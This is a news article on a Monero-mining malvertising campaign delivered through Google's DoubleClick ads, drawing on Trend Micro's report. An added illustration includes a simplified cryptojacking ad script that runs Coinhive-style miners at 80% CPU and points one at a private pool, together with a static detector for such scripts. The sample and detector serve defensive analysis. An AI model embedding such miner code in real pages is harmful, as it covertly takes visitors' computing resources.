19.04.2024

Malware Monero Miner Targets Google’s DoubleClick

Trend Micro, a provider of security software, hardware and services, discovered a malvertising campaign on high-traffic websites that used Coinhive, a JavaScript miner that lets website admins mine Monero with visitors' CPUs.

The attackers targeted Google's DoubleClick, which provides Internet ad-serving services, to distribute the ads, Trend Micro reported on its security intelligence blog. The malicious advertisements also used a separate web miner that connects to a private pool.

Trend Micro has reported its findings to Google about the campaign, which affected Japan, France, Taiwan, Italy and Spain.

Trend Micro noticed a rise in traffic to five malicious domains on Jan. 18, and on Jan. 24 it found a nearly 285% jump in the number of Coinhive miners. The traffic came from DoubleClick advertisements.

Web Miner Scripts Embedded

Two different web miner scripts were embedded, along with a script displaying the advertisements from DoubleClick. The affected web page displayed the legitimate advertisement while the two web miners ran covertly in the background.

The use of the advertisements on legitimate websites is believed to be a ploy to attack a greater number of users.

The traffic connected to these miners declined after Jan. 24.

The advertisement contains JavaScript code that generates a random number between 1 and 100. When the number is above 10, it calls the coinhive.min script to mine with 80% of the CPU power; this occurs 90% of the time. For the other 10%, a private web miner launches instead. Both miners were configured with throttle 0.2, meaning they use 80% of the CPU resources to mine.

After de-obfuscating the private web miner, known as mqoj_1, JavaScript code based on Coinhive can still be identified. The modified miner uses a different mining pool, wss://ws.l33tsite.info:8443, to avoid Coinhive's 30% commission fee.
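As an added illustration (not code from Trend Micro's report or from the campaign), the script below statically triages a constructed, simplified stand-in for the ad's JavaScript and pulls out what a defender would want to know: how many miner instances it creates, the CPU share each throttle setting grants, whether miner selection is randomized, and which pool endpoints are not Coinhive's own. The sample script, the site key, the pool hostnames and the `COINHIVE_POOL` pattern are assumptions.

```javascript
// Constructed, simplified stand-in for the ad script described above
// (not the real campaign's code): a random split between a Coinhive
// miner and a second Coinhive-derived miner pointed at a private pool.
// The site key and pool hostnames are placeholders.
const SAMPLE_AD_SCRIPT = `
var n = Math.floor(Math.random() * 100) + 1;
if (n > 10) {
  CoinHive.CONFIG.WEBSOCKET_SHARDS = [['wss://ws001.coinhive.com/proxy']];
  var m = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', { throttle: 0.2 });
  m.start();
} else {
  CoinHive.CONFIG.WEBSOCKET_SHARDS = [['wss://pool.invalid:8443']];
  var p = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', { throttle: 0.2 });
  p.start();
}
`;

// Assumed pattern for Coinhive's own WebSocket shards; anything else is
// treated as a private pool like the one Trend Micro observed.
const COINHIVE_POOL = /^wss:\/\/ws\d*\.coinhive\.com/;

// Static triage of a script body. Coinhive's throttle is the idle
// fraction, so the CPU share handed to the miner is 1 - throttle.
function analyzeMinerScript(src) {
  const minerCalls = (src.match(/new\s+CoinHive\.[A-Za-z]+\s*\(/g) || []).length;
  const throttles = [...src.matchAll(/throttle\s*:\s*([0-9]*\.?[0-9]+)/g)]
    .map(m => parseFloat(m[1]));
  const cpuShares = throttles.map(t => Math.round((1 - t) * 100));
  const pools = [...src.matchAll(/wss?:\/\/[^'"\s\]]+/g)].map(m => m[0]);
  const privatePools = pools.filter(u => !COINHIVE_POOL.test(u));
  // A Math.random() gate around miner construction is the 90/10 split above.
  const randomizedSelection = /Math\.random\s*\(/.test(src);
  const suspicious = minerCalls > 0 &&
    (cpuShares.some(s => s >= 50) || privatePools.length > 0);
  return { minerCalls, throttles, cpuShares, pools, privatePools,
           randomizedSelection, suspicious };
}
```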


Attacks Can Be Prevented

Coinhive miners can be prevented from using CPU resources by blocking JavaScript-based applications from running in browsers, the blog noted. The impact of cryptocurrency malware and other threats that exploit system vulnerabilities can be mitigated by regularly updating and patching software.

Trend Micro Smart Protection Suites and Worry-Free Business Security protect businesses and users from threats by blocking malicious files and related URLs.

Trend Micro Protection Suites provide capabilities such as behavior monitoring, web reputation services, high-fidelity machine learning and application control to reduce the impact of such cryptocurrency miners and other threats.
